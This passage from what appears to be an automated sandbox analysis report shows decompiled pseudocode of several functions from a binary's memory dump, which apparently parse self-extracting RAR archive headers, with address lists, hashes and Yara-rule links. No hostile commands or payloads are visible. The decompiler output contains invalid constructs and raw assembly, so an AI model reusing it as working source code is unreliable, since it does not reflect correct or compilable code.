				signed int _t178;
				char* _t190;
				intOrPtr _t191;
				intOrPtr _t197;
				intOrPtr* _t199;
				signed int _t202;
				void* _t204;
				char* _t205;
				intOrPtr _t206;
				void* _t207;

				_t197 = __edx;
				_t169 = __ecx;
				E00D8D870(E00DA1451, _t207);
				_t199 = _t169;
				_push(7);
				_t164 = _t199 + 0x21f8;
				_push(_t199 + 0x21f8);
				 *((char*)(_t199 + 0x6cbc)) = 0;
				 *((char*)(_t199 + 0x6cc4)) = 0;
				if( *((intOrPtr*)( *_t199 + 0xc))() == 7) {
					 *(_t199 + 0x6cc0) =  *(_t199 + 0x6cc0) & 0x00000000;
					_t106 = E00D71D09(_t164, 7);
					__eflags = _t106;
					if(_t106 == 0) {
						E00D76ED7(_t207 - 0x38, 0x200000);
						 *(_t207 - 4) =  *(_t207 - 4) & 0x00000000;
						_t109 =  *((intOrPtr*)( *_t199 + 0x14))();
						_t197 =  *_t199;
						 *((intOrPtr*)(_t207 - 0x18)) = _t109;
						_t110 =  *((intOrPtr*)(_t197 + 0xc))( *((intOrPtr*)(_t207 - 0x38)),  *((intOrPtr*)(_t207 - 0x34)) + 0xfffffff0);
						_t175 = _t110;
						_t202 = 0;
						 *(_t207 - 0x14) = _t175;
						_t166 = 1;
						__eflags = _t175;
						if(_t175 <= 0) {
							L22:
							__eflags =  *(_t199 + 0x6cc0);
							_t176 = _t207 - 0x38;
							if( *(_t199 + 0x6cc0) != 0) {
								_t37 = _t207 - 4; // executed
								 *_t37 =  *(_t207 - 4) | 0xffffffff;
								__eflags =  *_t37;
								E00D7159C(_t176); // executed
								L25:
								_t112 =  *(_t199 + 0x6cb0);
								__eflags = _t112 - 4;
								if(__eflags != 0) {
									__eflags = _t112 - 3;
									if(_t112 != 3) {
										 *((intOrPtr*)(_t199 + 0x2200)) = 7;
										L32:
										 *((char*)(_t207 - 0xd)) = 0;
										__eflags = E00D7391A(_t199, _t197);
										 *(_t207 - 0xe) = 0;
										__eflags = 0 - 1;
										if(0 != 1) {
											L38:
											_t116 =  *((intOrPtr*)(_t207 - 0xd));
											L39:
											_t178 =  *((intOrPtr*)(_t199 + 0x6cc5));
											__eflags = _t178;
											if(_t178 == 0) {
												L41:
												__eflags =  *((char*)(_t199 + 0x6cc4));
												if( *((char*)(_t199 + 0x6cc4)) != 0) {
													L43:
													__eflags = _t178;
													if(__eflags == 0) {
														E00D7134C(__eflags, 0x1b, _t199 + 0x1e);
													}
													__eflags =  *((char*)(_t207 + 8));
													if( *((char*)(_t207 + 8)) != 0) {
														L48:
														__eflags =  *(_t207 - 0xe);
														 *((char*)(_t199 + 0x6cb6)) =  *((intOrPtr*)(_t199 + 0x2224));
														if( *(_t207 - 0xe) == 0) {
															L69:
															__eflags =  *((char*)(_t199 + 0x6cb5));
															if( *((char*)(_t199 + 0x6cb5)) == 0) {
																L71:
																E00D7FAB1(_t199 + 0x6cfa, _t199 + 0x1e, 0x800);
																L72:
																_t119 = _t166;
																goto L73;
															}
															__eflags =  *((char*)(_t199 + 0x6cb9));
															if( *((char*)(_t199 + 0x6cb9)) == 0) {
																goto L72;
															}
															goto L71;
														}
														__eflags =  *((char*)(_t199 + 0x21e0));
														if( *((char*)(_t199 + 0x21e0)) == 0) {
															L51:
															_t204 =  *((intOrPtr*)( *_t199 + 0x14))();
															 *((intOrPtr*)(_t207 - 0x24)) = _t197;
															 *((intOrPtr*)(_t207 + 8)) =  *((intOrPtr*)(_t199 + 0x6ca0));
															 *((intOrPtr*)(_t207 - 0x18)) =  *((intOrPtr*)(_t199 + 0x6ca4));
															 *(_t207 - 0x14) =  *(_t199 + 0x6ca8);
															 *((intOrPtr*)(_t207 - 0x1c)) =  *((intOrPtr*)(_t199 + 0x6cac));
															 *((intOrPtr*)(_t207 - 0x20)) =  *((intOrPtr*)(_t199 + 0x21dc));
															while(1) {
																_t127 = E00D7391A(_t199, _t197);
																__eflags = _t127;
																if(_t127 == 0) {
																	break;
																}
																_t128 =  *((intOrPtr*)(_t199 + 0x21dc));
																__eflags = _t128 - 3;
																if(_t128 != 3) {
																	__eflags = _t128 - 2;
																	if(_t128 == 2) {
																		__eflags =  *((char*)(_t199 + 0x6cb5));
																		if( *((char*)(_t199 + 0x6cb5)) == 0) {
																			L66:
																			_t129 = 0;
																			__eflags = 0;
																			L67:
																			 *((char*)(_t199 + 0x6cb9)) = _t129;
																			L68:
																			 *((intOrPtr*)(_t199 + 0x6ca0)) =  *((intOrPtr*)(_t207 + 8));
																			 *((intOrPtr*)(_t199 + 0x6ca4)) =  *((intOrPtr*)(_t207 - 0x18));
																			 *(_t199 + 0x6ca8) =  *(_t207 - 0x14);
																			 *((intOrPtr*)(_t199 + 0x6cac)) =  *((intOrPtr*)(_t207 - 0x1c));
																			 *((intOrPtr*)(_t199 + 0x21dc)) =  *((intOrPtr*)(_t207 - 0x20));
																			 *((intOrPtr*)( *_t199 + 0x10))(_t204,  *((intOrPtr*)(_t207 - 0x24)), 0);
																			goto L69;
																		}
																		__eflags =  *((char*)(_t199 + 0x3318));
																		if( *((char*)(_t199 + 0x3318)) != 0) {
																			goto L66;
																		}
																		_t129 = _t166;
																		goto L67;
																	}
																	__eflags = _t128 - 5;
																	if(_t128 == 5) {
																		goto L68;
																	}
																	L60:
																	E00D71E3B(_t199);
																	continue;
																}
																__eflags =  *((char*)(_t199 + 0x6cb5));
																if( *((char*)(_t199 + 0x6cb5)) == 0) {
																	L56:
																	_t138 = 0;
																	__eflags = 0;
																	L57:
																	 *((char*)(_t199 + 0x6cb9)) = _t138;
																	goto L60;
																}
																__eflags =  *((char*)(_t199 + 0x5668));
																if( *((char*)(_t199 + 0x5668)) != 0) {
																	goto L56;
																}
																_t138 = _t166;
																goto L57;
															}
															goto L68;
														}
														__eflags =  *((char*)(_t199 + 0x6cbc));
														if( *((char*)(_t199 + 0x6cbc)) != 0) {
															goto L69;
														}
														goto L51;
													} else {
														L46:
														_t119 = 0;
														L73:
														L74:
														 *[fs:0x0] =  *((intOrPtr*)(_t207 - 0xc));
														return _t119;
													}
												}
												__eflags = _t116;
												if(_t116 != 0) {
													goto L48;
												}
												goto L43;
											}
											__eflags =  *((char*)(_t207 + 8));
											if( *((char*)(_t207 + 8)) == 0) {
												goto L46;
											}
											goto L41;
										}
										__eflags = 0;
										 *((char*)(_t207 - 0xd)) = 0;
										while(1) {
											E00D71E3B(_t199);
											_t143 =  *((intOrPtr*)(_t199 + 0x21dc));
											__eflags = _t143 - _t166;
											if(_t143 == _t166) {
												break;
											}
											__eflags =  *((char*)(_t199 + 0x21e0));
											if( *((char*)(_t199 + 0x21e0)) == 0) {
												L37:
												_t144 = E00D7391A(_t199, _t197);
												__eflags = _t144;
												_t145 = _t144 & 0xffffff00 | _t144 != 0x00000000;
												 *(_t207 - 0xe) = _t145;
												__eflags = _t145 - 1;
												if(_t145 == 1) {
													continue;
												}
												goto L38;
											}
											__eflags = _t143 - 4;
											if(_t143 == 4) {
												break;
											}
											goto L37;
										}
										_t116 = _t166;
										goto L39;
									}
									_t205 = _t199 + 0x21ff;
									_t147 =  *((intOrPtr*)( *_t199 + 0xc))(_t205, _t166);
									__eflags = _t147 - _t166;
									if(_t147 != _t166) {
										goto L46;
									}
									__eflags =  *_t205;
									if( *_t205 != 0) {
										goto L46;
									}
									 *((intOrPtr*)(_t199 + 0x2200)) = 8;
									goto L32;
								}
								E00D7134C(__eflags, 0x3c, _t199 + 0x1e);
								goto L46;
							}
							E00D7159C(_t176);
							goto L46;
						} else {
							goto L6;
						}
						do {
							L6:
							_t190 =  *((intOrPtr*)(_t207 - 0x38)) + _t202;
							__eflags =  *_t190 - 0x52;
							if( *_t190 != 0x52) {
								goto L17;
							}
							_t152 = E00D71D09(_t190, _t110 - _t202);
							__eflags = _t152;
							if(_t152 == 0) {
								L16:
								_t110 =  *(_t207 - 0x14);
								goto L17;
							}
							_t191 =  *((intOrPtr*)(_t207 - 0x18));
							 *(_t199 + 0x6cb0) = _t152;
							__eflags = _t152 - _t166;
							if(_t152 != _t166) {
								L19:
								_t197 =  *_t199;
								_t153 = _t202 + _t191;
								 *(_t199 + 0x6cc0) = _t153;
								 *((intOrPtr*)(_t197 + 0x10))(_t153, 0, 0);
								_t155 =  *(_t199 + 0x6cb0);
								__eflags = _t155 - 2;
								if(_t155 == 2) {
									L21:
									 *((intOrPtr*)( *_t199 + 0xc))(_t199 + 0x21f8, 7);
									goto L22;
								}
								__eflags = _t155 - 3;
								if(_t155 != 3) {
									goto L22;
								}
								goto L21;
							}
							__eflags = _t202;
							if(_t202 <= 0) {
								goto L19;
							}
							__eflags = _t191 - 0x1c;
							if(_t191 >= 0x1c) {
								goto L19;
							}
							__eflags =  *(_t207 - 0x14) - 0x1f;
							if( *(_t207 - 0x14) <= 0x1f) {
								goto L19;
							}
							_t159 =  *((intOrPtr*)(_t207 - 0x38)) - _t191;
							__eflags =  *((char*)(_t159 + 0x1c)) - 0x52;
							if( *((char*)(_t159 + 0x1c)) != 0x52) {
								goto L16;
							}
							__eflags =  *((char*)(_t159 + 0x1d)) - 0x53;
							if( *((char*)(_t159 + 0x1d)) != 0x53) {
								goto L16;
							}
							__eflags =  *((char*)(_t159 + 0x1e)) - 0x46;
							if( *((char*)(_t159 + 0x1e)) != 0x46) {
								goto L16;
							}
							__eflags =  *((char*)(_t159 + 0x1f)) - 0x58;
							if( *((char*)(_t159 + 0x1f)) == 0x58) {
								goto L19;
							}
							goto L16;
							L17:
							_t202 = _t202 + 1;
							__eflags = _t202 - _t110;
						} while (_t202 < _t110);
						goto L22;
					}
					 *(_t199 + 0x6cb0) = _t106;
					_t166 = 1;
					__eflags = _t106 - 1;
					if(_t106 == 1) {
						_t206 =  *_t199;
						_t160 =  *((intOrPtr*)(_t206 + 0x14))(0);
						asm("sbb edx, 0x0");
						 *((intOrPtr*)(_t206 + 0x10))(_t160 - 7, _t197);
					}
					goto L25;
				}
				_t119 = 0;
				goto L74;
			}




































              0x00d71973
              0x00d71973
              0x00d71978
              0x00d71982
              0x00d71984
              0x00d71988
              0x00d7198e
              0x00d7198f
              0x00d71996
              0x00d719a3
              0x00d719ac
              0x00d719b7
              0x00d719bc
              0x00d719be
              0x00d719f4
              0x00d719fd
              0x00d71a01
              0x00d71a07
              0x00d71a12
              0x00d71a15
              0x00d71a1a
              0x00d71a1c
              0x00d71a1e
              0x00d71a21
              0x00d71a22
              0x00d71a24
              0x00d71ab9
              0x00d71ab9
              0x00d71ac0
              0x00d71ac3
              0x00d71acf
              0x00d71acf
              0x00d71acf
              0x00d71ad3
              0x00d71ad8
              0x00d71ad8
              0x00d71ade
              0x00d71ae1
              0x00d71af3
              0x00d71af6
              0x00d71b24
              0x00d71b2e
              0x00d71b32
              0x00d71b3a
              0x00d71b3f
              0x00d71b42
              0x00d71b44
              0x00d71b7d
              0x00d71b7d
              0x00d71b80
              0x00d71b80
              0x00d71b86
              0x00d71b88
              0x00d71b90
              0x00d71b90
              0x00d71b97
              0x00d71b9d
              0x00d71b9d
              0x00d71b9f
              0x00d71ba7
              0x00d71ba7
              0x00d71bac
              0x00d71bb0
              0x00d71bbd
              0x00d71bbd
              0x00d71bc7
              0x00d71bcd
              0x00d71cc5
              0x00d71cc5
              0x00d71ccc
              0x00d71cd7
              0x00d71ce7
              0x00d71cec
              0x00d71cec
              0x00000000
              0x00d71cec
              0x00d71cce
              0x00d71cd5
              0x00000000
              0x00000000
              0x00000000
              0x00d71cd5
              0x00d71bd3
              0x00d71bda
              0x00d71be9
              0x00d71bf0
              0x00d71bf2
              0x00d71bfb
              0x00d71c04
              0x00d71c0d
              0x00d71c16
              0x00d71c1f
              0x00d71c60
              0x00d71c62
              0x00d71c67
              0x00d71c69
              0x00000000
              0x00000000
              0x00d71c24
              0x00d71c2a
              0x00d71c2d
              0x00d71c4f
              0x00d71c52
              0x00d71c6d
              0x00d71c74
              0x00d71c83
              0x00d71c83
              0x00d71c83
              0x00d71c85
              0x00d71c85
              0x00d71c8b
              0x00d71c90
              0x00d71c99
              0x00d71ca2
              0x00d71cab
              0x00d71cb9
              0x00d71cc2
              0x00000000
              0x00d71cc2
              0x00d71c76
              0x00d71c7d
              0x00000000
              0x00000000
              0x00d71c7f
              0x00000000
              0x00d71c7f
              0x00d71c54
              0x00d71c57
              0x00000000
              0x00000000
              0x00d71c59
              0x00d71c5b
              0x00000000
              0x00d71c5b
              0x00d71c2f
              0x00d71c36
              0x00d71c45
              0x00d71c45
              0x00d71c45
              0x00d71c47
              0x00d71c47
              0x00000000
              0x00d71c47
              0x00d71c38
              0x00d71c3f
              0x00000000
              0x00000000
              0x00d71c41
              0x00000000
              0x00d71c41
              0x00000000
              0x00d71c6b
              0x00d71bdc
              0x00d71be3
              0x00000000
              0x00000000
              0x00000000
              0x00d71bb2
              0x00d71bb2
              0x00d71bb2
              0x00d71cee
              0x00d71cef
              0x00d71cf4
              0x00d71cfe
              0x00d71cfe
              0x00d71bb0
              0x00d71b99
              0x00d71b9b
              0x00000000
              0x00000000
              0x00000000
              0x00d71b9b
              0x00d71b8a
              0x00d71b8e
              0x00000000
              0x00000000
              0x00000000
              0x00d71b8e
              0x00d71b46
              0x00d71b48
              0x00d71b4b
              0x00d71b4d
              0x00d71b52
              0x00d71b58
              0x00d71b5a
              0x00000000
              0x00000000
              0x00d71b5c
              0x00d71b63
              0x00d71b6a
              0x00d71b6c
              0x00d71b71
              0x00d71b73
              0x00d71b76
              0x00d71b79
              0x00d71b7b
              0x00000000
              0x00000000
              0x00000000
              0x00d71b7b
              0x00d71b65
              0x00d71b68
              0x00000000
              0x00000000
              0x00000000
              0x00d71b68
              0x00d71bb9
              0x00000000
              0x00d71bb9
              0x00d71afa
              0x00d71b04
              0x00d71b07
              0x00d71b09
              0x00000000
              0x00000000
              0x00d71b0f
              0x00d71b12
              0x00000000
              0x00000000
              0x00d71b18
              0x00000000
              0x00d71b18
              0x00d71ae9
              0x00000000
              0x00d71ae9
              0x00d71ac5
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00d71a2a
              0x00d71a2a
              0x00d71a2d
              0x00d71a2f
              0x00d71a32
              0x00000000
              0x00000000
              0x00d71a38
              0x00d71a3d
              0x00d71a3f
              0x00d71a7a
              0x00d71a7a
              0x00000000
              0x00d71a7a
              0x00d71a41
              0x00d71a44
              0x00d71a4a
              0x00d71a4c
              0x00d71a84
              0x00d71a84
              0x00d71a86
              0x00d71a90
              0x00d71a96
              0x00d71a99
              0x00d71a9f
              0x00d71aa2
              0x00d71aa9
              0x00d71ab6
              0x00000000
              0x00d71ab6
              0x00d71aa4
              0x00d71aa7
              0x00000000
              0x00000000
              0x00000000
              0x00d71aa7
              0x00d71a4e
              0x00d71a50
              0x00000000
              0x00000000
              0x00d71a52
              0x00d71a55
              0x00000000
              0x00000000
              0x00d71a57
              0x00d71a5b
              0x00000000
              0x00000000
              0x00d71a60
              0x00d71a62
              0x00d71a66
              0x00000000
              0x00000000
              0x00d71a68
              0x00d71a6c
              0x00000000
              0x00000000
              0x00d71a6e
              0x00d71a72
              0x00000000
              0x00000000
              0x00d71a74
              0x00d71a78
              0x00000000
              0x00000000
              0x00000000
              0x00d71a7d
              0x00d71a7d
              0x00d71a7e
              0x00d71a7e
              0x00000000
              0x00d71a82
              0x00d719c2
              0x00d719c8
              0x00d719c9
              0x00d719cb
              0x00d719d1
              0x00d719d7
              0x00d719df
              0x00d719e4
              0x00d719e4
              0x00000000
              0x00d719cb
              0x00d719a5
              0x00000000

              APIs
              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: H_prolog
              • String ID:
              • API String ID: 3519838083-0
              • Opcode ID: a5d91b6ccf96dbd28a5fb1b07d1acedfb46d48233fcd38f08e10afa611fd83d9
              • Instruction ID: 7f941ee596f27a6bb14a51b7d551bbbb15675f0fea0b4413262e8e30aa82537a
              • Opcode Fuzzy Hash: a5d91b6ccf96dbd28a5fb1b07d1acedfb46d48233fcd38f08e10afa611fd83d9
              • Instruction Fuzzy Hash: 2AB1C478A04646AFEB29CFBCC484BB9FBA5FF05304F188359D45D93281E7209955CBB1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D781C4, Relevance: 1.6, APIs: 1, Instructions: 110COMMON
              Download Yara Rule
              C-Code - Quality: 91%
              			E00D781C4(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __eflags) {
				void* __esi;
				void* _t47;
				signed int _t50;
				signed int _t51;
				void* _t53;
				signed int _t55;
				signed int _t61;
				intOrPtr _t73;
				signed int _t80;
				intOrPtr _t88;
				void* _t89;
				void* _t91;
				intOrPtr _t93;
				void* _t95;
				void* _t98;

				_t98 = __eflags;
				_t90 = __edi;
				_t88 = __edx;
				_t73 = __ecx;
				E00D8D870(E00DA12D2, _t95);
				E00D8D940();
				_t93 = _t73;
				_t1 = _t95 - 0x9d58; // -38232
				E00D7137D(_t1, _t88, __edi, _t98,  *(_t93 + 8));
				 *(_t95 - 4) =  *(_t95 - 4) & 0x00000000;
				_t6 = _t95 - 0x9d58; // -38232
				if(E00D79C0E(_t6, _t93 + 0xf4) != 0) {
					_t7 = _t95 - 0x9d58; // -38232, executed
					_t47 = E00D71973(_t7, _t88, 1); // executed
					if(_t47 != 0) {
						__eflags =  *((char*)(_t95 - 0x3093));
						if( *((char*)(_t95 - 0x3093)) == 0) {
							_push(__edi);
							_t91 = 0;
							__eflags =  *(_t95 - 0x30a3);
							if( *(_t95 - 0x30a3) != 0) {
								_t10 = _t95 - 0x9d3a; // -38202
								_t11 = _t95 - 0x1010; // -2064
								_t61 = E00D7FAB1(_t11, _t10, 0x800);
								__eflags =  *(_t95 - 0x309e);
								while(1) {
									_t17 = _t95 - 0x1010; // -2064
									E00D7B782(_t17, 0x800, (_t61 & 0xffffff00 | __eflags == 0x00000000) & 0x000000ff);
									_t18 = _t95 - 0x2058; // -6232
									E00D76EF9(_t18);
									_push(0);
									_t19 = _t95 - 0x2058; // -6232
									_t20 = _t95 - 0x1010; // -2064
									_t61 = E00D7A1B1(_t18, _t88, __eflags, _t20, _t19);
									__eflags = _t61;
									if(_t61 == 0) {
										break;
									}
									_t91 = _t91 +  *((intOrPtr*)(_t95 - 0x1058));
									asm("adc ebx, [ebp-0x1054]");
									__eflags =  *(_t95 - 0x309e);
								}
								 *((intOrPtr*)(_t93 + 0x98)) =  *((intOrPtr*)(_t93 + 0x98)) + _t91;
								asm("adc [esi+0x9c], ebx");
							}
							_t23 = _t95 - 0x9d58; // -38232
							E00D7835C(_t93, _t88, _t23);
							_t50 =  *(_t93 + 8);
							_t89 = 0x49;
							_pop(_t90);
							_t80 =  *(_t50 + 0x82f2) & 0x0000ffff;
							__eflags = _t80 - 0x54;
							if(_t80 == 0x54) {
								L11:
								 *((char*)(_t50 + 0x61f9)) = 1;
							} else {
								__eflags = _t80 - _t89;
								if(_t80 == _t89) {
									goto L11;
								}
							}
							_t51 =  *(_t93 + 8);
							__eflags =  *((intOrPtr*)(_t51 + 0x82f2)) - _t89;
							if( *((intOrPtr*)(_t51 + 0x82f2)) != _t89) {
								__eflags =  *((char*)(_t51 + 0x61f9));
								_t32 =  *((char*)(_t51 + 0x61f9)) == 0;
								__eflags =  *((char*)(_t51 + 0x61f9)) == 0;
								E00D80FBD((_t51 & 0xffffff00 | _t32) & 0x000000ff, (_t51 & 0xffffff00 | _t32) & 0x000000ff, _t93 + 0xf4);
							}
							_t33 = _t95 - 0x9d58; // -38232
							E00D71E4F(_t33, _t89);
							do {
								_t34 = _t95 - 0x9d58; // -38232
								_t53 = E00D7391A(_t34, _t89);
								_t35 = _t95 - 0xd; // 0x7f3
								_t36 = _t95 - 0x9d58; // -38232
								_t55 = E00D783C0(_t93, _t36, _t53, _t35); // executed
								__eflags = _t55;
							} while (_t55 != 0);
						}
					} else {
						E00D76E03(0xdb00e0, 1);
					}
				}
				_t37 = _t95 - 0x9d58; // -38232, executed
				E00D7162D(_t37, _t90, _t93); // executed
				 *[fs:0x0] =  *((intOrPtr*)(_t95 - 0xc));
				return 0;
			}


















              0x00d781c4
              0x00d781c4
              0x00d781c4
              0x00d781c4
              0x00d781c9
              0x00d781d3
              0x00d781d9
              0x00d781db
              0x00d781e4
              0x00d781e9
              0x00d781f4
              0x00d78201
              0x00d78209
              0x00d7820f
              0x00d78216
              0x00d78229
              0x00d78230
              0x00d78237
              0x00d7823a
              0x00d7823c
              0x00d78242
              0x00d78249
              0x00d78250
              0x00d78257
              0x00d7825c
              0x00d78277
              0x00d78283
              0x00d7828a
              0x00d7828f
              0x00d78295
              0x00d7829a
              0x00d7829c
              0x00d782a3
              0x00d782aa
              0x00d782af
              0x00d782b1
              0x00000000
              0x00000000
              0x00d78264
              0x00d7826a
              0x00d78270
              0x00d78270
              0x00d782b3
              0x00d782b9
              0x00d782b9
              0x00d782bf
              0x00d782c8
              0x00d782cd
              0x00d782d2
              0x00d782d3
              0x00d782d4
              0x00d782dc
              0x00d782df
              0x00d782e6
              0x00d782e6
              0x00d782e1
              0x00d782e1
              0x00d782e4
              0x00000000
              0x00000000
              0x00d782e4
              0x00d782ed
              0x00d782f0
              0x00d782f7
              0x00d782f9
              0x00d78307
              0x00d78307
              0x00d7830e
              0x00d7830e
              0x00d78313
              0x00d78319
              0x00d7831e
              0x00d7831e
              0x00d78324
              0x00d78329
              0x00d7832e
              0x00d78337
              0x00d7833c
              0x00d7833c
              0x00d7831e
              0x00d78218
              0x00d7821f
              0x00d7821f
              0x00d78216
              0x00d78340
              0x00d78346
              0x00d78351
              0x00d7835b

              APIs
              • __EH_prolog.LIBCMT ref: 00D781C9
                • Part of subcall function 00D7137D: __EH_prolog.LIBCMT ref: 00D71382
                • Part of subcall function 00D7137D: new.LIBCMT ref: 00D713FA
                • Part of subcall function 00D71973: __EH_prolog.LIBCMT ref: 00D71978
              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: H_prolog
              • String ID:
              • API String ID: 3519838083-0
              • Opcode ID: d827fa5a88342c1f0008b5cdb12b54e3e2a07989dfe06fa64d9fb9ab98405ee9
              • Instruction ID: 4729b4fdba2c9a8b064332304a685e53a184adec2187bea50b832c991a5d9530
              • Opcode Fuzzy Hash: d827fa5a88342c1f0008b5cdb12b54e3e2a07989dfe06fa64d9fb9ab98405ee9
              • Instruction Fuzzy Hash: C24194719406549ADB24EB64C855BEAB779DF40700F0480EAE58E93093FF745EC8EB70
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D82A7F, Relevance: 1.6, APIs: 1, Instructions: 90COMMON
              Download Yara Rule
              C-Code - Quality: 72%
              			E00D82A7F(void* __ecx, void* __edx) {
				void* __edi;
				void* __esi;
				void* _t29;
				signed int _t30;
				signed int* _t36;
				signed int _t38;
				intOrPtr _t39;
				intOrPtr _t42;
				signed int _t44;
				void* _t47;
				void* _t48;
				void* _t56;
				void* _t60;
				signed int _t65;
				void* _t67;
				void* _t69;
				void* _t73;

				_t56 = __edx;
				_t48 = __ecx;
				_t29 = E00D8D870(E00DA1486, _t67);
				_push(_t48);
				_push(_t48);
				_t60 = _t48;
				_t44 = 0;
				_t72 =  *((intOrPtr*)(_t60 + 0x20));
				if( *((intOrPtr*)(_t60 + 0x20)) == 0) {
					_push(0x400400); // executed
					_t42 = E00D8DB02(_t48, _t56, 0x400400, _t72); // executed
					 *((intOrPtr*)(_t60 + 0x20)) = _t42;
					_t29 = E00D8E920(_t60, _t42, 0, 0x400400);
					_t69 = _t69 + 0x10;
				}
				_t73 =  *(_t60 + 0x18) - _t44;
				if(_t73 == 0) {
					_t65 =  *((intOrPtr*)(_t60 + 0x1c)) +  *((intOrPtr*)(_t60 + 0x1c));
					_t30 = _t65;
					 *(_t67 - 0x10) = _t65;
					_t58 = _t30 * 0x4ae4 >> 0x20;
					_push( ~(0 | _t73 > 0x00000000) | ( ~(_t73 > 0) | _t30 * 0x00004ae4) + 0x00000004);
					_t36 = E00D8DB02(( ~(_t73 > 0) | _t30 * 0x00004ae4) + 4, _t30 * 0x4ae4 >> 0x20, _t65, _t73);
					_pop(0xdb00e0);
					 *(_t67 - 0x14) = _t36;
					 *(_t67 - 4) = _t44;
					_t74 = _t36;
					if(_t36 != 0) {
						_push(E00D81788);
						_push(E00D81611);
						_push(_t65);
						_t16 =  &(_t36[1]); // 0x4
						_t44 = _t16;
						 *_t36 = _t65;
						_push(0x4ae4);
						_push(_t44);
						E00D8D96D(_t58, _t74);
					}
					 *(_t67 - 4) =  *(_t67 - 4) | 0xffffffff;
					 *(_t60 + 0x18) = _t44;
					_t29 = E00D8E920(_t60, _t44, 0, _t65 * 0x4ae4);
					if(_t65 != 0) {
						_t38 = 0;
						 *(_t67 - 0x10) = 0;
						do {
							_t47 =  *(_t60 + 0x18) + _t38;
							if( *((intOrPtr*)(_t47 + 0x4ad4)) == 0) {
								 *((intOrPtr*)(_t47 + 0x4adc)) = 0x4100;
								_t39 = E00D92B53(0xdb00e0); // executed
								 *((intOrPtr*)(_t47 + 0x4ad4)) = _t39;
								0xdb00e0 = 0x30c00;
								if(_t39 == 0) {
									E00D76D3A(0xdb00e0);
								}
								_t38 =  *(_t67 - 0x10);
							}
							_t38 = _t38 + 0x4ae4;
							 *(_t67 - 0x10) = _t38;
							_t65 = _t65 - 1;
						} while (_t65 != 0);
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t67 - 0xc));
				return _t29;
			}




















              0x00d82a7f
              0x00d82a7f
              0x00d82a84
              0x00d82a89
              0x00d82a8a
              0x00d82a8e
              0x00d82a90
              0x00d82a92
              0x00d82a95
              0x00d82a9c
              0x00d82a9d
              0x00d82aa5
              0x00d82aa8
              0x00d82aad
              0x00d82aad
              0x00d82ab0
              0x00d82ab3
              0x00d82abe
              0x00d82ac5
              0x00d82ac7
              0x00d82aca
              0x00d82adf
              0x00d82ae0
              0x00d82ae5
              0x00d82ae6
              0x00d82ae9
              0x00d82aec
              0x00d82aee
              0x00d82af0
              0x00d82af5
              0x00d82afa
              0x00d82afb
              0x00d82afb
              0x00d82afe
              0x00d82b00
              0x00d82b05
              0x00d82b06
              0x00d82b06
              0x00d82b0b
              0x00d82b15
              0x00d82b1c
              0x00d82b26
              0x00d82b28
              0x00d82b2a
              0x00d82b2d
              0x00d82b30
              0x00d82b39
              0x00d82b40
              0x00d82b4a
              0x00d82b4f
              0x00d82b55
              0x00d82b58
              0x00d82b5f
              0x00d82b5f
              0x00d82b64
              0x00d82b64
              0x00d82b67
              0x00d82b6c
              0x00d82b6f
              0x00d82b6f
              0x00d82b2d
              0x00d82b26
              0x00d82b7a
              0x00d82b84

              APIs
              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: H_prolog
              • String ID:
              • API String ID: 3519838083-0
              • Opcode ID: 6335c4c36825df140551f7351a190b81cd284f1aa344468f63e5dea839b54cce
              • Instruction ID: a235ee497b8f39760d58d49e91d85cec86b35cbfd699ea4f4d1b5f04973bc499
              • Opcode Fuzzy Hash: 6335c4c36825df140551f7351a190b81cd284f1aa344468f63e5dea839b54cce
              • Instruction Fuzzy Hash: EC21A0B1E41215AFDB14AFB5DC42A6B77BCEB05314F04463AE519AB681E770AD00CBB8
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D89EEF, Relevance: 1.6, APIs: 1, Instructions: 71COMMON
              Download Yara Rule
              C-Code - Quality: 83%
              			E00D89EEF(void* __ecx, void* __edx, void* __eflags) {
				void* __edi;
				void* __esi;
				short _t33;
				char _t36;
				void* _t47;
				void* _t50;
				short _t55;
				void* _t57;
				void* _t58;
				short _t60;
				void* _t62;
				intOrPtr _t64;
				void* _t67;

				_t67 = __eflags;
				_t57 = __edx;
				_t47 = __ecx;
				E00D8D870(E00DA14E1, _t62);
				_push(_t47);
				E00D8D940();
				_push(_t60);
				_push(_t58);
				 *((intOrPtr*)(_t62 - 0x10)) = _t64;
				 *((intOrPtr*)(_t62 - 4)) = 0;
